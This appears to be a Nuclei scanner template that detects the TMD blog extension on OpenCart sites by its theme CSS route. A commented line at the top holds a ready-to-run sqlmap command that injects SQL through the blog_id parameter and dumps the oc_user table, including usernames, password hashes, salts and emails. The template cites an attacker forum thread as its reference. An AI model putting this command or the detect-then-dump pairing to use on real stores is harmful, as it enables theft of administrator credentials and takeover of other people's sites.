#
#sqlmap -u "/index.php?route=extension/tmd/blog&tmdblogcategory_id=4&blog_id=2*" --dbms="MySQL" --random-agent --force-ssl --risk=3 --level=2 --tamper=space2comment --batch --current-db -T oc_user -C username,password,salt,email,ip,code --dump --flush-session
#UNIQUE ID SECTION
id: tmd-blog-css
info:
  name: blog in opencart     
  author: 0x0xporn
  severity: info
  description: WOW! PARSER HERE!                                 
  reference: https://xss.is/threads/80413/post-815392
  tags: xss.is


http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?route=extension/tmd/blogthemecss"

    matchers-condition: and  
    matchers:
      - type: word
        words:
          - "latestblog1"
      - type: status
        status:
          - 200